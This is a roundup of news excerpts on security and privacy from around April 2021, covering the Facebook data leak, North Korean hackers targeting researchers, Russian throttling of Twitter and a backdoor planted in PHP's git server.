Security News This Week: Oh Look, LinkedIn Also Has a 500M User Data Leak

WIRED

A week into the revelation that Facebook leaked the data of 500 million users—including phone numbers and other potentially sensitive info—and the company still hasn’t given a full account of what happened. But we’ve managed to figure out both that the root of the problem was Facebook’s “contact import” feature, and that Facebook had plenty of opportunities to fix that issue before it resulted in attackers scraping half a billion people’s data.

On Thursday, federal agents arrested a 28-year-old Texas man for allegedly plotting to blow up an Amazon data center in Virginia. According to court documents, he had made alarming posts on the forums at MyMilitia.com, which someone then reported to the FBI. While it’s a concerning incident, domestic terror experts say there are no signs that Big Tech is a more pronounced target than in years past despite the heightened rhetoric from the far-right around supposed censorship.

Encrypted messaging app Signal announced this week that it would begin integrating the relatively new cryptocurrency MobileCoin. While a payments feature helps Signal keep up with its more full-featured competitors, the move raised questions as to whether Signal was inviting regulator interest and overly complicating a product lauded for its simplicity and ease of use.

Full article

Russia’s Twitter throttling may give censors never-before-seen capabilities

Ars Technica

Russia has implemented a novel censorship method in an ongoing effort to silence Twitter. Instead of outright blocking the social media site, the country is using previously unseen techniques to slow traffic to a crawl and make the site all but unusable for people inside the country.

Research published Tuesday says that the throttling slows traffic traveling between Twitter and Russia-based end users to a paltry 128kbps. Whereas past Internet censorship techniques used by Russia and other nation-states have relied on outright blocking, slowing traffic passing to and from a widely used Internet service is a relatively new technique that provides benefits for the censoring party.

Full article

553,000,000 Reasons Not to Let Facebook Make Decisions About Your Privacy

Electronic Frontier Foundation

Another day, another horrific Facebook privacy scandal. We know what comes next: Facebook will argue that losing a lot of our data means bad third-party actors are the real problem that we should trust Facebook to make more decisions about our data to protect against them. If history is any indication, that’ll work. But if we finally wise up, we’ll respond to this latest crisis with serious action: passing America’s long-overdue federal privacy law (with a private right of action) and forcing interoperability on Facebook so that its user/hostages can escape its walled garden.

In January 2021, Motherboard reported on a bot that was selling records from a 500 million-plus person trove of Facebook  data, offering phone numbers and other personal information. Facebook said the data had been scraped by using a bug that was available as early as 2016, and which the company claimed to have patched in 2019. Last week, a dataset containing 553 million Facebook users’ data—including phone numbers, full names, locations, email addresses, and biographical information—was published for free online. (It appears this is the same dataset Motherboard reported on in January). More than half a billion current and former Facebook users are now at high risk of various kinds of fraud.

Full article

Technology could make fighting COVID less restrictive but privacy will take a hit

ZDNet

Two of the nations held up as exemplars of how to fight COVID were Taiwan and New Zealand, but the approaches were very different: One has locked down parts of its population multiple times, and the other with more experience of respiratory viruses, has avoided such approaches.

A recent academic paper published in the Journal of the Royal Society of New Zealand examined the two nations and raised a number of questions that deserve to be considered in light of a year of lockdowns, contact tracing, outbreaks, and other restrictions on the movement of people.

The central push of the paper is that as New Zealand has kept individual privacy as a paramount concern, this has led directly to the use of city or nationwide lockdowns, which it has labelled as a blunt instrument.

Full article

Hackers Set Up a Fake Cybersecurity Firm to Target Security Experts

The Hacker News

A North Korean government-backed campaign targeting cybersecurity researchers with malware has re-emerged with new tactics in their arsenal as part of a fresh social engineering attack.

In an update shared on Wednesday, Google’s Threat Analysis Group said the attackers behind the operation set up a fake security company called SecuriElite and a slew of social media accounts across Twitter and LinkedIn in an attempt to trick unsuspecting researchers into visiting the company’s booby-trapped website where a browser exploit was waiting to be triggered.

Full article

How to check if your info was exposed in the Facebook data leak

Bleeping Computer

Data breach notification service Have I Been Pwned can now be used to check if your personal information was exposed in yesterday’s Facebook data leak that contains the phone numbers and information for over 500 million users.

Yesterday, a threat actor released the personal information for 533,313,128 Facebook users on a hacking forum, including mobile numbers, name, gender, location, relationship status, occupation, date of birth, and email addresses.

This data was originally sold in private sales after being collected in 2019 using a bug in the ‘Add Friend’ feature on Facebook. Facebook had closed this vulnerability soon after it was discovered, but threat actors continued to circulate the data until it was finally released practically for free ($2.19) yesterday. 

Since then, Troy Hunt has added the leaked data to his Have I Been Pwned data breach notification service to help users determine if a Facebook member’s data was exposed in the leak.

Full article

Google: North Korean hackers target security researchers again

Bleeping Computer

Google’s Threat Analysis Group (TAG) says that North Korean government-sponsored hackers are once again targeting security researchers using fake Twitter and LinkedIn social media accounts.

The hackers also created a website for a fake company named SecuriElite (located in Turkey) and supposedly offering offensive security services as the Google security team focused on hunting down state-backed hackers discovered on March 17.

All LinkedIn and Twitter accounts created by the North Korean hackers and associated with this new campaign were reported by Google and are now disabled.

Just as in the attacks detected during January 2021, this site was also hosting the attackers’ PGP public key, which was used as bait to infect security researchers with malware after triggering a browser exploit on opening the page.

Full article

Step up your privacy game with encrypted email (not just for techies)

Mullvad

As a kid, did you also assign each letter of the alphabet to another and write secret messages to your friends, perhaps even invisibly with lemon juice?

Caesar or Atbash cipher is a great start, but it isn’t very secure, online. Making the leap to communicating with encrypted emails isn’t very difficult, and it’s a great way to improve your online privacy game.

Full article

Hackers backdoor PHP source code after breaching internal git server

Ars Technica

A hacker compromised the server used to distribute the PHP programming language and added a backdoor to source code that would have made websites vulnerable to complete takeover, members of the open source project said.

Two updates pushed to the PHP Git server over the weekend added a line that, if run by a PHP-powered website, would have allowed visitors with no authorization to execute code of their choice. The malicious commits here and here gave the code the code-injection capability to visitors who had the word “zerodium” in an HTTP header.

Full article